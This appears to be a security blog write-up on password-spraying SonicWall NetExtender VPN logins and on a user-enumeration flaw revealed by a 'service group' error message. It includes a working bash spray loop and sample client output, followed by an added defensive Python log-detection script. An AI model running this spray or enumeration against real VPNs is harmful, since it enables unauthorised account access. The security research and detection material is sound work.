A little while ago I got to play around with a SonicWall firewall that had NetExtender configured. NetExtender is SonicWall’s SSL VPN offering. While my initial goal was just to password spray it, I found a few interesting quirks with the NetExtender client along the way.
Since I had some past experience with SonicWall and NetExtender, I knew there was a Linux CLI client, which led me to believe it would be relatively easy to script a login with it. I downloaded the latest Linux NetExtender client, which can be found with a quick Google search, and installed it. An example of a login attempt using the bare minimum amount of info looks something like this:
    netExtender -u user -p password -d LocalDomain 192.168.1.1:4433
    NetExtender for Linux - Version 9.0.803
    SonicWall
    Copyright (c) 2018 SonicWall
    Connecting to 192.168.1.1:4433…
    There is a problem with the site's security certificate.
    Warning: self signed certificate
    Do you want to proceed? (Y:Yes, N:No, V:View Certificate)
    Connected.
    Logging in…
    Authentication failure: Login failed - Incorrect username/password.
    SSL VPN logging out…
    Logout command failed
    SSL VPN connection is terminated.
    Exiting NetExtender client
A couple notes about the options and outputs I want to clear up first. The “Login failed” message is pretty self-explanatory. The “-u” and “-p” flags should be pretty obvious. The “-d” flag is the login domain, which may be an Active Directory/LDAP back end or the local authentication service (this value is CaSe SeNsItIvE). The default local authentication domain is “LocalDomain”. The warning about a self-signed certificate has to be answered, even if you import the cert on the machine. I imagine this wouldn’t be an issue if a valid cert was used. While I was a little disappointed I didn’t immediately get a successful login with user:password, I at least felt that I could script this and spray it regardless. After some trial and error, I came up with this ugly thing:
for j in `cat passwords.txt`; do for i in `cat ../users.txt`; do echo -e "\n\n ***login attempt: $i : $j ***"; echo -e "Y\n" | netExtender -u $i -p $j -d LocalDomain 192.168.1.1:4433; sleep 1; done; done
While it may be ugly and slow, it does the job. It will iterate through the list of users and attempt to log in as each user with all the passwords in the list provided. I had a couple delays that would ruin the timing for input, so I added a “sleep 1” in there to help with that; it may require a somewhat bigger value depending on connection speeds/reliability. Additionally, it will echo out the username and password attempted, since that isn’t echoed back in the login process itself. If I had a successful attempt, a VPN connection would succeed and just hang there, which I would hopefully catch.
After a few rounds with various user lists, I noticed the following interesting login message:
    ***login attempt for: user3 : password ***
    NetExtender for Linux - Version 9.0.803
    SonicWall
    Copyright (c) 2018 SonicWall
    Connecting to 192.168.1.1:4433…
    There is a problem with the site's security certificate.
    Warning: self signed certificate
    Do you want to proceed? (Y:Yes, N:No, V:View Certificate)
    Connected.
    Logging in…
    Authentication failure: User doesn't belong to SSLVPN service group
    SSL VPN logging out…
    Logout command failed
    SSL VPN connection is terminated.
    Exiting NetExtender client
Well, it looks like we have a valid user! It won’t do us much good here since it doesn’t have permission to log in via NetExtender. I initially thought maybe the password was valid, but after a little playing around I found out that the same message was returned regardless of the password value. A nice little user enumeration.
While this may not immediately be valuable since you can’t directly use any of the enumerated users to log into NetExtender, you can always use them for other services or validate the username format. Also, while I didn’t/couldn’t test this with an Active Directory/LDAP back end, it may prove to be a handy way to enum/spray AD from an external perspective.
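On the defensive side, both behaviours described above leave a recognisable trace in authentication records: one source failing against many distinct usernames in a short window, and the group-membership message confirming that an account exists. The following is an added example, not code from the original post or from SonicWall; the "time source user result" export format, the addresses, the usernames and the thresholds are constructed assumptions, and only the two result strings come from the client output shown above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a hypothetical "time src user result" export format;
# only the two result strings are taken from the client output shown in the post.
SAMPLE_LOG = """\
2024-01-01T10:00:01 203.0.113.7 user1 Incorrect username/password
2024-01-01T10:00:03 203.0.113.7 user2 Incorrect username/password
2024-01-01T10:00:05 203.0.113.7 user3 User doesn't belong to SSLVPN service group
2024-01-01T10:00:07 203.0.113.7 user4 Incorrect username/password
2024-01-01T10:20:00 198.51.100.9 alice Incorrect username/password
2024-01-01T10:20:30 198.51.100.9 alice Incorrect username/password
"""

GROUP_MSG = "User doesn't belong to SSLVPN service group"

def parse(log_text):
    """Yield (timestamp, source, user, result) tuples, skipping blank lines."""
    for line in filter(str.strip, log_text.splitlines()):
        ts, src, user, result = line.split(" ", 3)
        yield datetime.fromisoformat(ts), src, user, result

def spray_sources(events, min_users=3, window=timedelta(minutes=5)):
    """Map each source to the most distinct users it failed against within one window."""
    by_src = defaultdict(list)
    for ts, src, user, _ in events:
        by_src[src].append((ts, user))
    flagged = {}
    for src, attempts in by_src.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until it spans at most `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = {u for _, u in attempts[start:end + 1]}
            if len(users) >= min_users:
                flagged[src] = max(len(users), flagged.get(src, 0))
    return flagged

def disclosed_accounts(events):
    """Accounts whose existence the group-membership message confirmed to the client."""
    return sorted({user for _, _, user, result in events if result == GROUP_MSG})

if __name__ == "__main__":
    events = list(parse(SAMPLE_LOG))
    print("possible spray sources:", spray_sources(events))
    print("accounts disclosed as valid:", disclosed_accounts(events))
```

Accounts returned by `disclosed_accounts` are worth watching on other externally reachable services, since the post notes that enumerated usernames can be reused there.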